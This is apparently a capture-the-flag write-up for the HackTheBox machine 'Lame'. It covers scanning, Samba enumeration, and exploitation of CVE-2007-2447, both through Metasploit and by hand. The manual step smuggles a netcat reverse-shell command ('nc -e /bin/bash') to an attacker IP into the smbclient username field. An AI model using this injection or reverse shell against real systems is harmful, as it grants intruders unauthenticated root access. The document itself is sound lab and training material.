HTB: Lame

HTB: Lame — Full Writeup

Lame is one of the first machines on HackTheBox and a classic starting point for beginners. It runs a vulnerable version of Samba that allows unauthenticated remote code execution directly as root — no privilege escalation needed.

Machine Info

• OS: Linux (Ubuntu)
• Difficulty: Easy
• IP: 10.10.10.3
• Key Vulnerability: Samba 3.0.20 — CVE-2007-2447 (Username Map Script)

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and service versions:

nmap -sV -sC -p- --min-rate 5000 10.10.10.3

Key results from the scan:

• Port 21 — vsftpd 2.3.4 (anonymous login allowed)
• Port 22 — OpenSSH 4.7p1
• Port 139 / 445 — Samba smbd 3.0.20-Debian
• Port 3632 — distccd v1

Two interesting services stand out: vsftpd 2.3.4 (has a known backdoor) and Samba 3.0.20 (CVE-2007-2447). We'll try Samba first since it gives direct root access.

Step 2 — Samba Enumeration

Check available shares with smbclient:

smbclient -L //10.10.10.3 -N

Output shows shares including tmp which is accessible anonymously:

smbclient //10.10.10.3/tmp -N

We can connect. The Samba version 3.0.20 is vulnerable to CVE-2007-2447 — the Username Map Script command injection vulnerability. When a username containing shell metacharacters is passed to the username map script, it executes as root.

Step 3 — Exploitation (Metasploit)

Load the Metasploit module for this vulnerability:

msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.X   # your tun0 IP
set LPORT 4444
run

Metasploit connects back with a shell. Check who we are:

id
uid=0(root) gid=0(root) groups=0(root)

Direct root — no privilege escalation needed.

Step 4 — Exploitation (Manual, no Metasploit)

The same exploit can be done manually using smbclient. Set up a Netcat listener first:

nc -lvnp 4444

Then connect via smbclient and inject the payload into the username field:

smbclient //10.10.10.3/tmp -N
logon "./=`nohup nc -e /bin/bash 10.10.14.X 4444`"

The backtick command injection executes, and your listener receives a root shell.

Step 5 — Flags

With a root shell, grab both flags:

# User flag
cat /home/makis/user.txt

# Root flag
cat /root/root.txt

Bonus — vsftpd 2.3.4 Backdoor

The FTP service on port 21 runs vsftpd 2.3.4 which has a backdoor (CVE-2011-2523). Triggering it opens a shell on port 6200. However, on this machine the backdoor appears patched or firewalled — it does not work. The Samba exploit is the reliable path.

# Attempt (will likely fail on Lame)
nmap -p 6200 10.10.10.3
# or
use exploit/unix/ftp/vsftpd_234_backdoor

Key Takeaways

• Always check Samba versions — older versions are frequently exploitable
• CVE-2007-2447 requires no authentication and gives direct root
• The username map script option in Samba allows arbitrary command injection via username fields
• Manual exploitation using smbclient avoids relying on Metasploit — good practice for OSCP
• distccd on port 3632 is also exploitable (CVE-2004-2687) as an alternate path

Tools Used

• nmap — port scanning and service enumeration
• smbclient — SMB share enumeration and manual exploitation
• Metasploit — exploit/multi/samba/usermap_script
• netcat — reverse shell listener